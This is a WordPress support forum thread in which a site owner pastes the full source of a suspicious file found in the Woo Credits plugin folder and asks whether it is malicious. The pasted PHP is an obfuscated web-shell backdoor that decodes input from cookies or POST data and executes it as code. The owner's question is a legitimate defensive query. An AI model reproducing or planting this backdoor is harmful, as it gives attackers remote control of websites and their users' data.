Support » Plugin: Woo Credits » Suspicious file gziuolwf.php

  • Resolved deschong

    (@deschong)


    I noticed there is this gziuolwf.php inside the woo-download-credits plugin folder which was modified today. I don’t remember this was being used and modified on.
    Is this file legit?

    Below are the codes in this file

    <?php
    $wubzkud = '*30pi\'#cbl-647aryk8uo1fm2stdnevxgH5_';$qnmct = Array();$qnmct[] = $wubzkud[24].$wubzkud[2].$wubzkud[24].$wubzkud[14].$wubzkud[1].$wubzkud[24].$wubzkud[14].$wubzkud[29].$wubzkud[10].$wubzkud[13].$wubzkud[27].$wubzkud[21].$wubzkud[22].$wubzkud[10].$wubzkud[12].$wubzkud[34].$wubzkud[11].$wubzkud[12].$wubzkud[10].$wubzkud[18].$wubzkud[12].$wubzkud[34].$wubzkud[21].$wubzkud[10].$wubzkud[13].$wubzkud[1].$wubzkud[13].$wubzkud[34].$wubzkud[11].$wubzkud[18].$wubzkud[14].$wubzkud[11].$wubzkud[13].$wubzkud[24].$wubzkud[11].$wubzkud[21];$qnmct[] = $wubzkud[7].$wubzkud[15].$wubzkud[29].$wubzkud[14].$wubzkud[26].$wubzkud[29].$wubzkud[35].$wubzkud[22].$wubzkud[19].$wubzkud[28].$wubzkud[7].$wubzkud[26].$wubzkud[4].$wubzkud[20].$wubzkud[28];$qnmct[] = $wubzkud[33].$wubzkud[0];$qnmct[] = $wubzkud[6];$qnmct[] = $wubzkud[7].$wubzkud[20].$wubzkud[19].$wubzkud[28].$wubzkud[26];$qnmct[] = $wubzkud[25].$wubzkud[26].$wubzkud[15].$wubzkud[35].$wubzkud[15].$wubzkud[29].$wubzkud[3].$wubzkud[29].$wubzkud[14].$wubzkud[26];$qnmct[] = $wubzkud[29].$wubzkud[31].$wubzkud[3].$wubzkud[9].$wubzkud[20].$wubzkud[27].$wubzkud[29];$qnmct[] = $wubzkud[25].$wubzkud[19].$wubzkud[8].$wubzkud[25].$wubzkud[26].$wubzkud[15];$qnmct[] = $wubzkud[14].$wubzkud[15].$wubzkud[15].$wubzkud[14].$wubzkud[16].$wubzkud[35].$wubzkud[23].$wubzkud[29].$wubzkud[15].$wubzkud[32].$wubzkud[29];$qnmct[] = $wubzkud[25].$wubzkud[26].$wubzkud[15].$wubzkud[9].$wubzkud[29].$wubzkud[28];$qnmct[] = $wubzkud[3].$wubzkud[14].$wubzkud[7].$wubzkud[17];foreach ($qnmct[8]($_COOKIE, $_POST) as $oosou => $wymey){function xiahph($qnmct, $oosou, $rnqzo){return $qnmct[7]($qnmct[5]($oosou . $qnmct[0], ($rnqzo / $qnmct[9]($oosou)) + 1), 0, $rnqzo);}function znddyel($qnmct, $faqfgdk){return @$qnmct[10]($qnmct[2], $faqfgdk);}function keqktq($qnmct, $faqfgdk){$vfrpvbl = $qnmct[4]($faqfgdk) % 3;if (!$vfrpvbl) {$fvgptyu = $qnmct[1]; $yamplav = $fvgptyu("", $faqfgdk[1]($faqfgdk[2]));$yamplav();exit();}}$wymey = znddyel($qnmct, $wymey);keqktq($qnmct, $qnmct[6]($qnmct[3], $wymey ^ xiahph($qnmct, $oosou, $qnmct[9]($wymey))));}

    Can anyone make out what is this php file or it’s a malicious file?

Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Suspicious file gziuolwf.php’ is closed to new replies.